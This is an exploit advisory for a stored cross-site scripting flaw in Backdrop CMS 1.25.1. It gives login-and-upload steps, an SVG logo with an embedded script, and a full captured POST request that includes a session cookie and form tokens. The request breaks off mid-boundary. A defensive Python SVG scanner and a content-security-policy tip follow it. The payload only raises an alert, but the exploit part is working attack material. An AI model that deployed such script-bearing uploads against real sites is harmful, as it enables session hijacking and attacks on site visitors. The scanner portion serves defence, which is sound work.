
Backdrop CMS v1.25.1 - Stored Cross-Site Scripting (XSS)

HackApt-37 Team (verified member)

# Exploit Title: Backdrop CMS v1.25.1 - Stored Cross-Site Scripting (XSS)
# Application: Backdrop CMS
# Version: v1.25.1
# Bugs: Stored XSS
# Technology: PHP
# Vendor URL: https://backdropcms.org/
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
# Date: 12-07-2023
# Author: Mirabbas Ağalarov
# Tested On: Linux
2. Technical Details & POC
====================================================
1. Log in to an account
2. Go to http://localhost/backdrop/?q=admin/config/config/system/site-information
3. Upload the SVG file
'''
<?xml version='1.0' standalone='no'?>

<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>
alert(document.location);
</script>
</svg>
'''
4. Go to the SVG file (http://localhost/Backdrop/files/malas_2.svg)
Request
POST /backdrop/?q=admin/config/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ''
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvxwrshhm3tvjalpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Sess31B3AEE8377692AE3F36F0CF7FE0E752=ZUJTSSS2IU5SVCKAFTPKAFTPKAFTPK8ZPAXRNMFEBJ1Q26HXHAH____________E
Connection: close

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_name'

My Backdrop Site
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_slogan'

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_mail'

[email protected]
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='files[site_logo_upload]'; filename='malas.svg'
Content-Type: image/svg+xml

<?xml version='1.0' standalone='no'?>

<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_logo_path'

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='files[site_favicon_upload]'; filename=''
Content-Type: application/octet-stream

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_favicon_path'

core/misc/favicon.ico
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_frontpage'

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_403'

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='site_404'

------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='form_build_id'

form-pnr6afekcb5hawh3pdt2j0kkzswh0rdm0qbofgqnj-q
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='form_token'

siowtyeefvg7nedmtyphvz2d3d5u60s38l_crhbnw40
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='form_id'

system_site_information_settings
------WebKitFormBoundaryvxwrshhm3tvjalpg
Content-Disposition: form-data; name='op'

Save configuration
------WebKitForm
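
A defender-side check for the logo upload in step 3, added here as an example and not part of the original advisory or of Backdrop's own code: it parses an uploaded SVG and lists any script-capable content so the upload handler can reject the file. The names `svg_findings`, `local` and `ACTIVE_ELEMENTS`, and the choice of rejection rules, are assumptions of this example.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that run script or embed arbitrary markup when the file is opened directly.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

# Constructed samples: the SVG from the PoC above and a copy without its script element.
POC_SVG = b"""<?xml version='1.0' standalone='no'?>
<svg version='1.1' baseProfile='full' xmlns='http://www.w3.org/2000/svg'>
<polygon id='triangle' points='0,0 0,50 50,0' fill='#009900' stroke='#004400'/>
<script type='text/javascript'>alert(document.location);</script>
</svg>"""
CLEAN_SVG = POC_SVG.replace(POC_SVG.splitlines()[3], b"")

def local(name: str) -> str:
    return name.rsplit("}", 1)[-1]  # drop ElementTree's '{namespace}' prefix

def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means none were found."""
    try:
        text = data.decode("utf-8")  # scan exactly the text the parser will see
    except UnicodeDecodeError:
        return ["not UTF-8 text"]
    # Refuse DTDs: an uploaded image needs no entity declarations, and they enable
    # entity-expansion attacks on the parser.
    if "<!doctype" in text.lower() or "<!entity" in text.lower():
        return ["DTD or entity declaration present"]
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append("root element is not <svg> in the SVG namespace")
    for el in root.iter():
        name = local(el.tag)
        if name.lower() in ACTIVE_ELEMENTS:
            findings.append(f"active element <{name}>")
        for attr, value in el.attrib.items():
            attr_name = local(attr).lower()
            compact = "".join(value.split()).lower()  # browsers strip tabs/newlines from URLs
            if attr_name.startswith("on"):
                findings.append(f"event handler attribute {attr_name} on <{name}>")
            elif compact.startswith("javascript:"):
                findings.append(f"javascript: URL in {attr_name} on <{name}>")
    return findings

if __name__ == "__main__":
    print(svg_findings(POC_SVG), svg_findings(CLEAN_SVG))
```

Because a scan of this kind only covers the vectors it lists, uploaded SVG files are also commonly served with a `Content-Security-Policy` response header that disallows script.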
 